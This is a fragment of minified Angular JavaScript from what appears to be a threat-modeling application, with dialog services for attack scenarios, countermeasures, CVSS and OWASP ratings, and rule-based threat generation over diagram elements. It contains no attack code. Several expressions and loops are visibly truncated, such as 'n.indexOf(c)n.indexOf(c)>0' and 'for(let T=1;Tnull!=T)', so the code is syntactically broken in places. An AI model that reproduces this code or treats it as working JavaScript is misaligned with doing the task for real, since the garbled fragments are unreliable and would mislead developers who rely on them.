new(e||t)(Ee(Gh),Ee(Yi),Ee(A2))},t.\u0275cmp=Wt({type:t,selectors:[["app-password-protection-dialog"]],decls:31,vars:16,consts:[["mat-dialog-title",""],[2,"margin-bottom","15px"],[2,"vertical-align","bottom"],[4,"ngIf"],["align","end"],["mat-raised-button","","color","primary",3,"disabled","click"],["mat-button","","cdkFocusInitial","",3,"mat-dialog-close"],["color","primary",2,"padding-bottom","10px",3,"ngModel","ngModelChange"],[1,"field-width"],["matInput","",1,"field-width",3,"disabled","type","ngModel","ngModelChange"],["matSuffix","",3,"click"],["matSuffix","",3,"matTooltip"],["matInput","",1,"field-width",3,"type","ngModel","ngModelChange"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1),oe(2,"translate"),u(),s(3,"\n"),m(4,"mat-dialog-content"),s(5,"\n "),m(6,"div",1),s(7,"\n "),m(8,"mat-icon",2),s(9),u(),s(10," \n "),ne(11,$Pe,3,3,"ng-container",3),s(12,"\n "),ne(13,KPe,3,3,"ng-container",3),s(14,"\n "),u(),s(15,"\n\n "),ne(16,XPe,24,14,"div",3),s(17,"\n "),ne(18,YPe,18,9,"div",3),s(19,"\n"),u(),s(20,"\n"),m(21,"mat-dialog-actions",4),s(22,"\n "),m(23,"button",5),he("click",function(){return i.Change()}),s(24),oe(25,"translate"),u(),s(26,"\n "),m(27,"button",6),s(28),oe(29,"translate"),u(),s(30,"\n"),u()),2&e&&(g(1),ke(re(2,10,"dialog.passswordprotection.title")),g(8),ke(i.IsEncrypted?"lock":"lock_open_right"),g(2),F("ngIf",i.IsEncrypted),g(2),F("ngIf",!i.IsEncrypted),g(3),F("ngIf",i.IsEncrypted),g(2),F("ngIf",!i.IsEncrypted),g(5),F("disabled",!i.HasChanges),g(1),ke(re(25,12,"dialog.passswordprotection.Change")),g(3),F("mat-dialog-close",!0),g(1),ke(re(29,14,"general.Close")))},dependencies:[Ri,an,Ta,Ea,oa,br,da,nn,un,jr,Xa,Pa,vm,Am,Tm,Em,Xi],styles:[".field-width[_ngcontent-%COMP%]{width:355px}"]}),t})();class hf{}class E2{}class S5{}class k5{}class P5{}let Wn=(()=>{class t{constructor(e,i,n,r){this.dialog=e,this.translate=i,this.dataService=n,this.locStorage=r}OpenTwoOptionsDialog(e,i=!1,n=null,r=null){return this.dialog.open(_M,{hasBackdrop:i,data:e,width:n,minWidth:r}).afterClosed()}OpenUnsavedChangesDialog(){const e={title:this.translate.instant("dialog.unsaved.title"),textContent:this.translate.instant("dialog.unsaved.saveProject"),resultTrueText:this.translate.instant("general.Yes"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.No"),resultTrueEnabled:()=>!0,initalTrue:!0};return this.OpenTwoOptionsDialog(e)}OpenDeleteDialog(e){const i={title:this.translate.instant("dialog.delete.deleteItem")+" "+e,textContent:this.translate.instant("dialog.delete.sure"),resultTrueText:this.translate.instant("general.Yes"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.No"),resultTrueEnabled:()=>!0,initalTrue:!1};return this.OpenTwoOptionsDialog(i)}OpenDeleteObjectDialog(e){let i=bG.FindAllReferencesDeep(e,this.dataService.Project,this.dataService.Config),n=this.translate.instant("dialog.delete.sure");i.length>0&&(n+="\n\n",n+=this.translate.instant("dialog.delete.changes"),i.forEach(c=>{n+="\n"+bG.ToString(c,this.dataService,this.translate)}));const r={title:this.translate.instant("dialog.delete.deleteItem")+" "+e.Name,textContent:n,resultTrueText:this.translate.instant("general.Yes"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.No"),resultTrueEnabled:()=>!0,initalTrue:!1};return this.OpenTwoOptionsDialog(r)}OpenAttackScenarioDialog(e,i,n=null){const r={title:this.translate.instant("pages.modeling.attackscenario.dialogTitle"),resultTrueText:this.translate.instant(i?"general.Add":"general.Close"),hasResultFalse:i,resultFalseText:this.translate.instant("general.Cancel"),resultTrueEnabled:()=>!i||e.ThreatCategories.length>0,initalTrue:!1,component:lM,componentInputData:[{Key:Rc,Value:e}]};if(n){r.canIterate=!0;let c=e;const d=new Tt;r.componentInputData.push({Key:Tt,Value:d}),r.canNext=()=>n.indexOf(c)n.indexOf(c)>0,r.onNext=()=>{c=n[n.indexOf(c)+1],d.emit(c)},r.onPrevious=()=>{c=n[n.indexOf(c)-1],d.emit(c)}}return this.OpenTwoOptionsDialog(r)}OpenAddAttackVectorDialog(e){const i={title:this.translate.instant("pages.config.attackVectorEditDialogTitle"),resultTrueText:this.translate.instant("general.Add"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.Cancel"),resultTrueEnabled:()=>{var n;return(null===(n=e.Name)||void 0===n?void 0:n.length)>0&&null!=this.dataService.Config.FindGroupOfAttackVector(e)},initalTrue:!1,component:jg,componentInputData:[{Key:zp,Value:e}]};return this.OpenTwoOptionsDialog(i)}OpenViewAttackVectorDialog(e,i){const n=new hf;n.Value=i;const r={title:this.translate.instant("pages.config.attackVectorViewDialogTitle"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:jg,componentInputData:[{Key:zp,Value:e},{Key:hf,Value:n}]};return this.OpenTwoOptionsDialog(r,!0)}OpenViewThreatRuleDialog(e){const i={title:this.translate.instant("pages.config.threatRuleViewDialogTitle"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:qp,componentInputData:[{Key:Fp,Value:e}]};return this.OpenTwoOptionsDialog(i,!0)}OpenCVSSEntryDiaglog(e){const i=new k5;i.Value=e;const n={title:this.translate.instant("shared.cvss.name.l"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:Wm,componentInputData:[{Key:k5,Value:i}]};return this.OpenTwoOptionsDialog(n,!0)}OpenOwaspRREntryDiaglog(e){const i=new P5;i.Value=e;const n={title:this.translate.instant("shared.owasprr.name.l"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:IT,componentInputData:[{Key:P5,Value:i}]};return this.OpenTwoOptionsDialog(n,!0)}OpenAddMyDataDialog(e){const i={title:this.translate.instant("dialog.mydata.addDialogTitle"),resultTrueText:this.translate.instant("general.Add"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.Cancel"),resultTrueEnabled:()=>{var n;return(null===(n=e.Name)||void 0===n?void 0:n.length)>0&&null!=e.FindAssetGroup()},initalTrue:!1,component:v5,componentInputData:[{Key:Pu,Value:e}]};return this.OpenTwoOptionsDialog(i)}OpenCountermeasureDialog(e,i,n,r=null){let c=new hf;c.Value=i;const d={title:this.translate.instant("pages.modeling.countermeasure.dialogTitle"),resultTrueText:this.translate.instant(i?"general.Add":"general.Close"),hasResultFalse:i,resultFalseText:this.translate.instant("general.Cancel"),resultTrueEnabled:()=>!i||null!=e.Control||e.Targets.length>0,initalTrue:!1,component:cM,componentInputData:[{Key:Jl,Value:e},{Key:hf,Value:c},{Key:Array,Value:n}]};if(r){d.canIterate=!0;let T=e;const k=new Tt;d.componentInputData.push({Key:Tt,Value:k}),d.canNext=()=>r.indexOf(T)r.indexOf(T)>0,d.onNext=()=>{T=r[r.indexOf(T)+1],k.emit(T)},d.onPrevious=()=>{T=r[r.indexOf(T)-1],k.emit(T)}}return this.OpenTwoOptionsDialog(d,!1,null,"800px")}OpenTestCaseDialog(e,i,n=null){const r={title:this.translate.instant("general.TestCase"),resultTrueText:this.translate.instant(i?"general.Add":"general.Close"),hasResultFalse:i,resultFalseText:this.translate.instant("general.Cancel"),resultTrueEnabled:()=>!0,initalTrue:!1,component:gM,componentInputData:[{Key:$g,Value:e}]};if(n){r.canIterate=!0;let c=e;const d=new Tt;r.componentInputData.push({Key:Tt,Value:d}),r.canNext=()=>n.indexOf(c)n.indexOf(c)>0,r.onNext=()=>{c=n[n.indexOf(c)+1],d.emit(c)},r.onPrevious=()=>{c=n[n.indexOf(c)-1],d.emit(c)}}return this.OpenTwoOptionsDialog(r,!1,null,"800px")}OpenAddControlDialog(e){const i=new hf;i.Value=!0;const n={title:this.translate.instant("pages.config.control.dialogTitle"),resultTrueText:this.translate.instant("general.Add"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.Cancel"),resultTrueEnabled:()=>{var r;return(null===(r=e.Name)||void 0===r?void 0:r.length)>0&&null!=this.dataService.Config.FindGroupOfControl(e)},initalTrue:!1,component:T2,componentInputData:[{Key:Wg,Value:e},{Key:hf,Value:i}]};return this.OpenTwoOptionsDialog(n)}OpenMitigationProcessDialog(e,i){const n={title:this.translate.instant("pages.modeling.mitigationprocess.dialogTitle"),resultTrueText:this.translate.instant(i?"general.Add":"general.Close"),hasResultFalse:i,resultFalseText:this.translate.instant("general.Cancel"),resultTrueEnabled:()=>!0,initalTrue:!1,component:_T,componentInputData:[{Key:Lp,Value:e}]};return this.OpenTwoOptionsDialog(n)}OpenSuggestThreatsDialog(e){const i={title:this.translate.instant("pages.modeling.diagram.suggestedthreats.dialogTitle"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!1,component:Wke,componentInputData:[{Key:lc,Value:e}]};return this.OpenTwoOptionsDialog(i,!0,"800px")}OpenCveSearchDialog(e,i){let n=new E2;n.Value=i;const r={title:this.translate.instant("shared.cvesearch.title"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!1,component:BG,componentInputData:[{Key:Np,Value:e},{Key:E2,Value:n}]};return this.OpenTwoOptionsDialog(r,!0,"800px")}OpenProgresstrackerDialog(){const e={title:this.translate.instant("dialog.progress.title"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:zG};return this.OpenTwoOptionsDialog(e)}OpenNotesDialog(e,i=!1,n=!1,r=!1,c=!1){let d=new S5;d.Notes=e,d.HasCheckbox=n,d.ShowTimestamp=i,d.CanToggleTimestamp=r,d.CanToggleCheckbox=c;const T={title:this.translate.instant("general.Notes"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:jp,componentInputData:[{Key:S5,Value:d}]};return this.OpenTwoOptionsDialog(T,!0,800)}OpenModelInfoDialog(){const e={title:this.translate.instant("dialog.modelinfo.title"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:w5};return this.OpenTwoOptionsDialog(e)}OpenModelTasksNotesDialog(){const e={title:this.translate.instant("dialog.modelinfo.title")+": "+this.translate.instant("status-bar.TasksAndNotes"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:R5};return this.OpenTwoOptionsDialog(e)}OpenModelChangesDialog(){const e={title:this.translate.instant("dialog.modelinfo.title")+": "+this.translate.instant("dialog.modelchanges.Changes"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:UG};return this.OpenTwoOptionsDialog(e)}OpenPasswordProtectionDialog(){return this.dialog.open(JPe,{hasBackdrop:!1})}OpenCookieConsentDialog(){const e={title:this.translate.instant("dialog.cookie.title"),textContent:this.translate.instant("dialog.cookie.text"),initalTrue:!1,hasResultFalse:!0,resultTrueText:this.translate.instant("dialog.cookie.consent"),resultFalseText:this.translate.instant("dialog.cookie.reject"),resultTrueEnabled:()=>!0},i=this.OpenTwoOptionsDialog(e,!1,"600px");return i.subscribe(n=>{this.locStorage.Set(si.COOKIE_CONSENT,JSON.stringify(n))}),i}OpenGlossaryDialog(){const e={title:this.translate.instant("side-nav.Glossary"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:VPe};return this.OpenTwoOptionsDialog(e)}OpenRenameDialog(e,i){return this.dialog.open(P9e,{data:{Object:e,Property:i}})}OpenTagChartsDialog(){const e={title:this.translate.instant("dialog.tagcharts.title"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:F9e};return this.OpenTwoOptionsDialog(e,!0,"700px")}OpenViewImageDialog(e,i="700px"){const n=new E2;n.Value=e;const r={title:this.translate.instant("general.Image"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:kPe,componentInputData:[{Key:E2,Value:n}]};return this.OpenTwoOptionsDialog(r,!0,i)}OpenChangelogDialog(){return this.dialog.open(UPe,{hasBackdrop:!0,width:"1000px"}).afterClosed()}}return t.\u0275fac=function(e){return new(e||t)(At(vu),At(Sn),At(Yi),At(_r))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),RT=(()=>{class t{constructor(e,i){this.dataService=e,this.dialog=i}GenerateAllThreats(){let e=this.dataService.Project;return e.GetDiagrams().forEach(i=>this.GenerateDiagramThreats(i)),e.GetStacks().forEach(i=>this.GenerateStackThreats(i)),e.GetAttackScenarios()}GenerateDiagramThreats(e){if(!e.Elements)return[];let i=this.dataService.Project;i.GetAttackScenarios().filter(d=>d.ViewID==e.ID&&!d.IsGenerated).forEach(d=>d.MappingState=zn.Stable);let n=i.GetAttackScenarios().filter(d=>d.ViewID==e.ID&&d.IsGenerated);n.forEach(d=>d.RuleStillApplies=!0),n.filter(d=>d.MappingState==zn.Removed).forEach(d=>i.DeleteAttackScenario(d)),n=n.filter(d=>d.MappingState!=zn.Removed);let r=(d,T)=>{let k=d.filter(q=>[nl.EachElement,nl.OnceForEachElement].includes(q.RuleGenerationType));T.forEach(q=>{k.forEach(Y=>{this.checkElementAgainstRule(Y,q,T,e.Settings.GenerationAssetBased).forEach(pe=>{var Re;let Fe=this.checkForExistingMapping(Y,pe.target,Y.RuleGenerationType==nl.EachElement?pe.elements:null);if(Fe){Fe.MappingState=zn.Stable;const Ne=n.findIndex(et=>et.ID==Fe.ID);Ne>=0&&n.splice(Ne,1)}else i.CreateAttackScenario(e.ID,!0).SetMapping(null===(Re=Y.AttackVector)||void 0===Re?void 0:Re.ID,Y.ThreatCategories.map(et=>et.ID),pe.target,pe.elements,Y,null,null,null)})})}),k=d.filter(q=>q.RuleGenerationType==nl.OnceForAllElements),k.forEach(q=>{var Y;let te=[];if(T.forEach(pe=>{this.checkElementAgainstRule(q,pe,T,e.Settings.GenerationAssetBased).forEach(Fe=>te.push(...Fe.elements))}),te.length>0){let pe=this.checkForExistingMapping(q,1==te.length?te[0]:null,te);if(pe||(pe=this.checkForExistingMappingWithUpdatedElements(q,1==te.length?te[0]:null,te),pe&&(pe.Targets=te,pe.GetCountermeasures().forEach(Re=>{let Fe=[];Re.AttackScenarios.forEach(Ne=>{Ne.Targets.forEach(et=>{Fe.includes(et)||Fe.push(et)})}),Re.Targets=Fe}))),pe){pe.MappingState=zn.Stable;const Re=n.findIndex(Fe=>Fe.ID==pe.ID);Re>=0&&n.splice(Re,1)}else i.CreateAttackScenario(e.ID,!0).SetMapping(null===(Y=q.AttackVector)||void 0===Y?void 0:Y.ID,q.ThreatCategories.map(Fe=>Fe.ID),1==te.length?te[0]:null,te,q,null,null,null)}})},c=[];if(e.Settings.GenerationThreatLibrary&&c.push(...this.dataService.Config.GetThreatRules().filter(d=>d.IsActive)),Object.keys(e.Settings.GenerationRules).length>0&&Object.keys(e.Settings.GenerationRules).forEach(d=>{const T=k=>{c.push(...k.ThreatRules),k.SubGroups&&k.SubGroups.forEach(q=>T(q))};T(this.dataService.Config.GetThreatRuleGroup(d))}),[xn.Hardware,xn.DataFlow].includes(e.DiagramType)&&r(c.filter(d=>d.RuleType==on.Stencil),e.Elements.GetChildrenFlat().filter(d=>!d.OutOfScope)),e.DiagramType==xn.DataFlow&&r(c.filter(d=>d.RuleType==on.DFD),e.Elements.GetChildrenFlat().filter(d=>d.GetProperty("Type").ElementTypeID==Et.DataFlow&&!d.OutOfScope)),e.DiagramType==xn.DataFlow&&r(c.filter(d=>d.RuleType==on.Protocol),e.Elements.GetChildrenFlat().filter(d=>d.GetProperty("Type").ElementTypeID==Et.DataFlow&&!d.OutOfScope)),Object.keys(e.Settings.GenerationMnemonics).length>0&&[xn.Hardware,xn.DataFlow].includes(e.DiagramType)){const d=e.Elements.GetChildrenFlat().filter(T=>!T.OutOfScope);Object.keys(e.Settings.GenerationMnemonics).map(T=>this.dataService.Config.GetStencilThreatMnemonic(T)).forEach(T=>{d.forEach(k=>{T.Letters.forEach(q=>{var Y;let te=!0;if(e.Settings.GenerationAssetBased&&(te=!1,k.GetProperty("ProcessedData")&&q.threatCategoryID)){const pe=this.dataService.Config.GetThreatCategory(q.threatCategoryID);te=k.GetProperty("ProcessedData").some(Re=>Re.ImpactCats.some(Fe=>pe.ImpactCats.includes(Fe)))}if(q.AffectedElementTypes.includes(k.Type.ElementTypeID)&&te){const pe=i.GetAttackScenarios().filter(Re=>{var Fe;return(null===(Fe=Re.Target)||void 0===Fe?void 0:Fe.ID)==k.ID}).filter(Re=>Re.ThreatMnemonicLetterID==q.ID);pe.length>0?pe.forEach(Re=>{Re.MappingState=zn.Stable;const Fe=n.findIndex(Ne=>Ne.ID==Re.ID);Fe>=0&&n.splice(Fe,1)}):i.CreateAttackScenario(e.ID,!0).SetMapping(null,[null===(Y=T.GetThreatCategory(q))||void 0===Y?void 0:Y.ID],k,[k],null,null,T,q)}})})})}return n.forEach(d=>{d.ThreatState==_o.NotSet?d.MappingState=zn.Removed:d.RuleStillApplies=!1}),i.GetAttackScenarios().filter(d=>d.ViewID==e.ID)}GenerateStackThreats(e){let i=this.dataService.Project;i.GetAttackScenarios().filter(c=>c.ViewID==e.ID&&!c.IsGenerated).forEach(c=>c.MappingState=zn.Stable);let n=i.GetAttackScenarios().filter(c=>c.ViewID==e.ID&&c.IsGenerated);return n.filter(c=>c.MappingState==zn.Removed).forEach(c=>i.DeleteAttackScenario(c)),n=n.filter(c=>c.MappingState!=zn.Removed),(c=>{c.forEach(d=>{this.dataService.Config.GetThreatRules().filter(T=>T.IsActive&&T.RuleType==on.Component&&T.RuleGenerationType==nl.EachElement).forEach(T=>{this.checkElementAgainstRule(T,d,c,!1).forEach(q=>{var Y;let te=this.checkForExistingMapping(T,q.target,q.elements);if(te){te.MappingState=zn.Stable;const pe=n.findIndex(Re=>Re.ID==te.ID);pe>=0&&n.splice(pe,1)}else{const pe=i.CreateAttackScenario(e.ID,!0);let Re=null;1==T.ComponentRestriction.DetailRestrictions.length&&(Re=i.Config.GetThreatQuestions().find(Fe=>Fe.ComponentType.ID==d.Type.ID&&Fe.Property.ID==T.ComponentRestriction.DetailRestrictions[0].PropertyRest.ID)),pe.SetMapping(null===(Y=T.AttackVector)||void 0===Y?void 0:Y.ID,T.ThreatCategories.map(Fe=>Fe.ID),q.target,q.elements,T,Re,null,null)}})})})})(e.GetChildren().filter(c=>!c.OutOfScope)),n.forEach(c=>{c.ThreatState==_o.NotSet?c.MappingState=zn.Removed:c.RuleStillApplies=!1}),i.GetAttackScenarios().filter(c=>c.ViewID==e.ID)}AddMnemonicThreat(e,i){if(e){let n=this.dataService.Project.FindDiagramOfElement(e.ID),r=this.dataService.Project.CreateAttackScenario(n.ID,!1);r.SetMapping("",[],e,[e],null,null,this.dataService.Config.GetStencilThreatMnemonics().find(d=>d.Letters.some(T=>T.ID==i.ID)),i),r.IsGenerated=!1;const c=this.dialog.OpenAttackScenarioDialog(r,!0);return c.subscribe(d=>{d||this.dataService.Project.DeleteAttackScenario(r)}),c}}checkElementAgainstRule(e,i,n,r){var c;if(e.RuleType==on.DFD){let d=(k,q,Y,te=!0)=>{var pe;const Re=te&&(e.DFDRestriction.AppliesReverse||[wn.Both,wn.Initiator].includes(k.ArrowPos));let Fe=e.DFDRestriction.NodeTypes[q+0],Ne=e.DFDRestriction.NodeTypes[q+1],et=!0;Y||(et&&!this.isCorrectNodeType(Fe,k.Sender)&&(et=!1),et&&!this.isCorrectNodeType(Ne,k.Receiver)&&(et=!1)),(Y||!et&&Re)&&(et=Y=!0,Fe=e.DFDRestriction.NodeTypes[e.DFDRestriction.NodeTypes.length-2-q],Ne=e.DFDRestriction.NodeTypes[e.DFDRestriction.NodeTypes.length-1-q],et&&!this.isCorrectNodeType(Fe,k.Receiver)&&(et=!1),et&&!this.isCorrectNodeType(Ne,k.Sender)&&(et=!1));let ut=null===(pe=e.DFDRestriction)||void 0===pe?void 0:pe.NodeRestrictions;if(et=et&&this.evalRestrictions(ut,e.RuleType,k,q),et&&r&&(et=!1,i.GetProperty("ProcessedData")&&e.ThreatCategories)){let Ze=[];e.ThreatCategories.forEach(yt=>Ze.push(...yt.ImpactCats)),et=i.GetProperty("ProcessedData").some(yt=>yt.ImpactCats.some(It=>Ze.includes(It)))}return[et,Y]};const T=i;if(2!=e.DFDRestriction.NodeTypes.length){let k=[],q=(te,pe,Re,Fe)=>{n.filter(et=>et instanceof rs).filter(et=>{var ut,Ze;return(null===(ut=et.Sender)||void 0===ut?void 0:ut.ID)==te.ID&&(null===(Ze=et.Receiver)||void 0===Ze?void 0:Ze.ID)!=pe[0].ID}).forEach(et=>{const ut=d(et,Re,Fe,!1);if(ut[0]){let Ze=[...pe,et,et.Receiver];Re+2==e.DFDRestriction.NodeTypes.length?k.push({target:te,elements:Ze}):q(et.Receiver,Ze,Re+1,ut[1])}})};const Y=d(T,0,!1);return Y[0]&&q(T.Receiver,[T.Sender,T,T.Receiver],1,Y[1]),k}{const k=d(T,0,!1);if(k[0]){const q=k[1]?1-e.DFDRestriction.Target:e.DFDRestriction.Target;let Y=T;return 0==q?Y=T.Sender:1==q&&(Y=T.Receiver),[{target:Y,elements:[T.Sender,T,T.Receiver]}]}}return[]}{let d=!0;if(e.RuleType==on.Stencil){const k=this.dataService.Config.GetStencilType(e.StencilRestriction.stencilTypeID);d=k.IsDefault?i.GetProperty("Type").ElementTypeID==k.ElementTypeID:i.GetProperty("Type").ID==e.StencilRestriction.stencilTypeID,d=d&&!(i instanceof td||i instanceof zm)}else e.RuleType==on.Component?d=i.Type.ID==e.ComponentRestriction.componentTypeID:e.RuleType==on.Protocol&&(d=i.ProtocolStack.map(k=>k.ID).includes(e.ProtocolRestriction.protocolID));let T=null===(c=e.StencilRestriction)||void 0===c?void 0:c.DetailRestrictions;return e.RuleType==on.Component&&(T=e.ComponentRestriction.DetailRestrictions),d=d&&this.evalRestrictions(T,e.RuleType,i,0),d?[{target:i,elements:[i]}]:[]}}evalRestrictions(e,i,n,r){if(null==e||0==e.length)return!0;let c=Math.max(...e.map(T=>T.Layer)),d=new Array(e.length);for(d.fill(null,0,e.length);c>=0;){let T=-1,k=!1;for(let q=0;q=0&&e[q].Layer!=c&&(k=!0),k||T>=0&&q==e.length-1){let Y=e.slice(T,q==e.length-1?q+1:q);d[T]=[c,Y[Y.length-1].IsOR,this.evalRestrictionWindow(Y,i,n,r)],T=-1,k=!1}c-=1}for(d=d.filter(T=>null!=T),c=Math.max(...e.map(T=>T.Layer));c>=0;){for(let T=1;Tnull!=T),0!=d.length&&(d.length>1?void console.error("Only one layer should remain"):d[0][2])}evalRestrictionWindow(e,i,n,r){let c=this.evalRestriction(e[0],i,n,r),d=e[0].IsOR;for(let T=1;T0&&(c=e.DataflowRest.TrustAreaIDs.includes(n.Sender.Parent.GetProperty("Type").ID)||e.DataflowRest.TrustAreaIDs.includes(n.Receiver.Parent.GetProperty("Type").ID)),c}return e.RestType==ya.PhysicalElement?i==on.Stencil?t.EvalProp(e.PhyElementRest.Property,n.PhysicalElement):e.NodeNumber==r+0?t.EvalProp(e.PhyElementRest.Property,n.Sender.PhysicalElement):e.NodeNumber==r+1?t.EvalProp(e.PhyElementRest.Property,n.Receiver.PhysicalElement):e.NodeNumber>=r+2:e.RestType==ya.SenderInterface?!!n.SenderInterface&&t.EvalProp(e.SenderInterfaceRestriction.Property,n.SenderInterface):e.RestType==ya.ReceiverInterface?!!n.ReceiverInterface&&t.EvalProp(e.ReceiverInterfaceRestriction.Property,n.ReceiverInterface):void console.error("Unknown path in evalRestriction()",e,i,n,r)}checkForExistingMapping(e,i,n){return this.dataService.Project.GetAttackScenarios().find(r=>{var c,d;let T=(null===(c=r.ThreatRule)||void 0===c?void 0:c.ID)==e.ID&&(null===(d=r.Target)||void 0===d?void 0:d.ID)==(null==i?void 0:i.ID);if(n&&(T=T&&r.Targets.length==n.length,T))for(let k=0;k{var c,d;let T=(null===(c=r.ThreatRule)||void 0===c?void 0:c.ID)==e.ID&&(null===(d=r.Target)||void 0===d?void 0:d.ID)==(null==i?void 0:i.ID);if(n&&T)if(n.length>r.Targets.length)for(let k=0;k{let c=this.dataService.Config.GetStencilType(r);n=c.IsDefault?n||i.GetProperty("Type").ElementTypeID==c.ElementTypeID:n||c.ID==i.GetProperty("Type").ID}),n}static EvalProp(e,i){if(!e.ID||!i)return!1;let n=i.GetProperty(e.ID);switch(e.ComparisonType){case cc.EqualsNot:return n!=e.Value;case cc.GreaterThan:return n>=e.Value;case cc.LessThan:return n<=e.Value;case cc.GreaterThanOrEquals:return n>=e.Value;case cc.LessThanOrEquals:return n<=e.Value;default:return n==e.Value}}}return t.\u0275fac=function(e){return new(e||t)(At(Yi),At(Wn))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();var Xg=(()=>{return(t=Xg||(Xg={}))[t.SWComponent=1]="SWComponent",Xg;var t})();class qG{static GetTypes(){return[Xg.SWComponent]}static ToString(a){return a===Xg.SWComponent?"general.SWComponent":(console.error("Missing ReqFulfillRuleTypesUtil.ToString()"),"Undefined")}}class Yg extends Ln{constructor(a,e){super(a),this.config=e,this.Data.subReqTypeIDs||(this.Data.subReqTypeIDs=[]),this.Data.RequiredPerLevel||(this.Data.RequiredPerLevel=[]),this.Data.ReqFulfillRule||(this.Data.ReqFulfillRule={})}get SubReqTypes(){let a=[];return this.Data.subReqTypeIDs.forEach(e=>a.push(this.config.GetRequirementType(e))),a}get RequiredPerLevel(){return this.Data.RequiredPerLevel}set RequiredPerLevel(a){this.Data.RequiredPerLevel=a}get ReqFulfillRule(){return this.Data.ReqFulfillRule}set ReqFulfillRule(a){this.Data.ReqFulfillRule=a}EvalRequirement(a){if(this.ReqFulfillRule.RuleType==Xg.SWComponent&&this.ReqFulfillRule.SWRule.ComponentTypeID&&this.ReqFulfillRule.SWRule.PropertyRest.ID){let e=a.SoftwareStack.GetChildrenFlat().find(i=>i.Type.ID==this.ReqFulfillRule.SWRule.ComponentTypeID);if(e){const i=RT.EvalProp(this.ReqFulfillRule.SWRule.PropertyRest,e),n=new Array(this.RequiredPerLevel.length).fill(!1);if(i)for(let r=0;ri.push({Type:li.DeleteRequirementType,Param:n})),e.GetChecklistTypes().filter(n=>n.RequirementTypes.find(r=>r.ID==this.ID)).forEach(n=>i.push({Type:li.RemoveRequirementTypeFromChecklistType,Param:n})),null==a||a.GetChecklists().filter(n=>n.Type.GetRequirementTypesFlat().find(r=>r.ID==this.ID)).forEach(n=>i.push({Type:li.RemoveRequirementTypeFromChecklist,Param:n})),i}OnDelete(a,e){let i=e.GetRequirementTypes().find(r=>r.SubReqTypes.some(c=>c.ID==this.ID));i&&i.RemoveSubRequirementType(this),this.FindReferences(a,e).forEach(r=>{if(r.Type==li.DeleteRequirementType)e.DeleteRequirementType(r.Param);else if(r.Type==li.RemoveRequirementTypeFromChecklistType)r.Param.RemoveRequirementType(this);else if(r.Type==li.RemoveRequirementTypeFromChecklist){const c=r.Param.RequirementValues.findIndex(d=>d.RequirementTypeID==this.ID);c>=0&&r.Param.RequirementValues.splice(c,1)}})}static FromJSON(a,e){return new Yg(a,e)}}class Jg extends Ln{constructor(a,e){super(a),this.config=e,null==this.Data.Levels&&(this.Levels=[]),this.Data.requirementTypeIDs||(this.Data.requirementTypeIDs=[])}get Levels(){return this.Data.Levels}set Levels(a){this.Data.Levels=a}get RequirementTypes(){let a=[];return this.Data.requirementTypeIDs.forEach(e=>a.push(this.config.GetRequirementType(e))),a}AddRequirementType(a){this.RequirementTypes.includes(a)||this.Data.requirementTypeIDs.push(a.ID)}RemoveRequirementType(a){this.RequirementTypes.includes(a)&&this.Data.requirementTypeIDs.splice(this.Data.requirementTypeIDs.indexOf(a.ID),1)}GetRequirementTypesFlat(){let a=[],e=i=>{i.forEach(n=>{a.push(n),e(n.SubReqTypes)})};return e(this.RequirementTypes),a}FindReferences(a,e){let i=[];return null==a||a.GetChecklists().filter(n=>n.Type.ID==this.ID).forEach(n=>i.push({Type:li.DeleteChecklist,Param:n})),i}OnDelete(a,e){let i=this.FindReferences(a,e);this.RequirementTypes.forEach(n=>e.DeleteRequirementType(n)),i.forEach(n=>{n.Type==li.DeleteChecklist&&a.DeleteChecklist(n.Param)})}static FromJSON(a,e){return new Jg(a,e)}}class CM extends Ln{constructor(a,e,i,n){super(a),this.config=n,this.project=i,this.Type=e,this.Data.RequirementValues||(this.Data.RequirementValues=[])}get Type(){return this.config.GetChecklistType(this.Data.typeID)}set Type(a){this.Data.typeID=null==a?void 0:a.ID}get RequirementValues(){return this.Data.RequirementValues}set RequirementValues(a){this.Data.RequirementValues=a}FindReferences(a,e){return[]}OnDelete(a,e){let i=a.GetDevices().find(n=>n.Checklists.includes(this));i&&i.RemoveChecklist(this)}static FromJSON(a,e,i){return new CM(a,i.GetChecklistType(a.typeID),e,i)}}class Wu extends 